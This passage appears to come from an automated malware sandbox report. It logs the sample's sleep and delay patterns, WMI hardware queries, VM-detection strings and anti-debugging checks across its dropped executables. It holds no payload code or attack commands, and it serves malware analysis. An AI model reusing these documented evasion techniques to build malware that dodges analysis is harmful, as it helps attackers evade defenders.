                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -597047s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -596891s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -596719s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -596591s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -596449s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -596290s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -596031s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -595813s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -595658s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -595531s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -595360s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -595203s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -595031s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -594844s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -594697s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -594531s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -594359s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -594191s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -594031s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -593886s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -593563s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -593318s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -593125s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -592959s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -592688s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -592375s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -592092s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -591828s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -591500s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -591266s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -591076s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -590883s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -590686s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -590344s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -590156s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -589953s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -589797s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -589625s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -589453s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -589219s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6244Thread sleep time: -589094s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exe TID: 6928Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select TotalPhysicalMemory From Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Model from Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer from Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00404399 FindFirstFileW,FindClose,SetLastError,CompareFileTime,8_2_00404399
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00403C8F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,8_2_00403C8F
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00403DA4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,8_2_00403DA4
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041EDD8 FindFirstFileExA,8_2_0041EDD8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BD4A8 GetFileAttributesW,FindFirstFileW,FindClose,21_2_00007FF73D0BD4A8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BC948 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00007FF73D0BC948
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CB93C FindFirstFileW,Sleep,FindNextFileW,FindClose,21_2_00007FF73D0CB93C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CB5C0 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,21_2_00007FF73D0CB5C0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CB418 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,21_2_00007FF73D0CB418
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C74F0 FindFirstFileW,FindNextFileW,FindClose,21_2_00007FF73D0C74F0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0834E0 FindFirstFileExW,21_2_00007FF73D0834E0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C82BC FindFirstFileW,FindClose,21_2_00007FF73D0C82BC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BC498 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00007FF73D0BC498
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C8370 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,21_2_00007FF73D0C8370
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D061D7C GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,21_2_00007FF73D061D7C
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeThread delayed: delay time: 30000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599867
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599586
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596449
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596290
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595813
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595658
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594697
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594191
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594031
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593318
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593125
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592959
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592688
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592375
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592092
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591828
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591266
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591076
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590883
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590686
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 590156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589797
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589625
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 589094
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ZooJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ViewersJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: explorer.exe, 00000001.00000000.1695827674.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 00000001.00000000.1695312230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: explorer.exe, 00000001.00000000.1695312230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                      Source: explorer.exe, 00000001.00000000.1695827674.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 00000001.00000000.1691821298.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: csrss.exe, 00000026.00000002.2993048897.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000001.00000000.1695827674.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: 1600.tmp, 00000029.00000002.2988575910.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                      Source: explorer.exe, 00000001.00000000.1695312230.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                      Source: explorer.exe, 00000001.00000000.1695312230.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1695312230.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2395264074.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2397253515.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2994847492.0000021A2C458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2991829562.0000021A2B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 1600.tmp, 00000029.00000002.2988575910.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: explorer.exe, 00000001.00000000.1695827674.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: csrss.exe, 00000026.00000002.2992253110.0000000000C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc:
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                      Source: explorer.exe, 00000001.00000000.1691821298.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 00000001.00000000.1695312230.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                      Source: explorer.exe, 00000001.00000000.1698160948.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                      Source: Far.pif, 00000015.00000003.2172006287.00000260E119E000.00000004.00000020.00020000.00000000.sdmp, Far.pif, 00000015.00000002.2175273355.00000260E119E000.00000004.00000020.00020000.00000000.sdmp, 4577.exe, 00000018.00000002.2990544999.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000002A.00000002.2787795709.0000000001608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: explorer.exe, 00000001.00000000.1691821298.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\987123.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\987123.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\987123.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2DF.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2DF.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D1B2C BlockInput,21_2_00007FF73D0D1B2C
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041A585 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0041A585
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D066140 GetLastError,IsDebuggerPresent,OutputDebugStringW,21_2_00007FF73D066140
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040D915 LoadLibraryA,GetProcAddress,InterlockedExchange,FreeLibrary,0_2_0040D915
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0072092B mov eax, dword ptr fs:[00000030h]0_2_0072092B
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00720D90 mov eax, dword ptr fs:[00000030h]0_2_00720D90
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0080FA7A push dword ptr fs:[00000030h]0_2_0080FA7A
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004C092B mov eax, dword ptr fs:[00000030h]3_2_004C092B
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004C0D90 mov eax, dword ptr fs:[00000030h]3_2_004C0D90
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_006EF23A push dword ptr fs:[00000030h]3_2_006EF23A
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041E059 mov eax, dword ptr fs:[00000030h]8_2_0041E059
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041E014 mov eax, dword ptr fs:[00000030h]8_2_0041E014
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041BE96 mov eax, dword ptr fs:[00000030h]8_2_0041BE96
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_027350A3 push dword ptr fs:[00000030h]13_2_027350A3
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028F0042 push dword ptr fs:[00000030h]13_2_028F0042
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041FD9D GetProcessHeap,8_2_0041FD9D
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040F997 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040F997
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_0040F997 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040F997
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041A8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0041A8A0
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041A585 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0041A585
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041CE21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0041CE21
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041A6EA SetUnhandledExceptionFilter,8_2_0041A6EA
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D065D6C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF73D065D6C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D065F50 SetUnhandledExceptionFilter,21_2_00007FF73D065F50
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D089574 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF73D089574
